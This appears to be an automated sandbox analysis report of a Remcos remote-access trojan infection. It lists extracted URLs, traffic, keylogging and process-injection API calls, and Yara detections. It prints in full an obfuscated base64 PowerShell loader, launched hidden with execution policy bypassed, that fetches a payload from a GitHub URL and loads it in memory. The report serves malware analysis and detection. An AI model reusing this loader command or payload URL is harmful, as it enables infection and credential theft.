                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.454067819.0000000001F59000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000019.00000002.465508111.0000000000569000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: RegAsm.exe, 00000019.00000002.464947704.000000000015C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com/DK
Source: RegAsm.exe, 00000012.00000002.453926573.000000000016C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com/cK
Source: RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://www.msn.com/
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: RegAsm.exe, 00000010.00000002.463843810.0000000000572000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: RegAsm.exe, 00000014.00000002.466839768.0000000000292000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.netP
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://contextual.media.net/
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhvC227.tmp.20.dr | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvC227.tmp.20.dr | String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: RegAsm.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: S7UYq0.url.0.dr | String found in binary or memory: https://og1.in/S7UYq0
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: powershell.exe, 0000000C.00000002.443014450.000000000238A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.443014450.000000000238A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443014450.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.446007440.0000000004FC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: RegAsm.exe, 00000010.00000002.465963894.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.466045684.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.466001637.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467538863.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467552558.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467525342.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: RegAsm.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr | String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 | 13_2_0040A2F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard | 13_2_0040B749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 13_2_004168FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 16_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 16_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 17_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 17_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 18_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 18_2_004072B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx | 13_2_0040A41B
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR

E-Banking Fraud
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041CA73 SystemParametersInfoW | 13_2_0041CA73

System Summary
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3864, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\S7UYq0.url
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\uc on 91.134.96.177.url
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError | 13_2_0041812A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle | 13_2_0041330D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle | 13_2_0041BBC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle | 13_2_0041BB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 16_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00401806 NtdllDefWindowProc_W | 16_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_004018C0 NtdllDefWindowProc_W | 16_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004016FD NtdllDefWindowProc_A | 17_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004017B7 NtdllDefWindowProc_A | 17_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 18_2_00402CAC NtdllDefWindowProc_A | 18_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 18_2_00402D66 NtdllDefWindowProc_A | 18_2_00402D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress | 13_2_004167EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004014AB18_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040513318_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004051A418_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040124618_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040CA4618_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040523518_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004032C818_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040168918_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402F6018_2_00402F60
Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434801 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434E70 appears 54 times
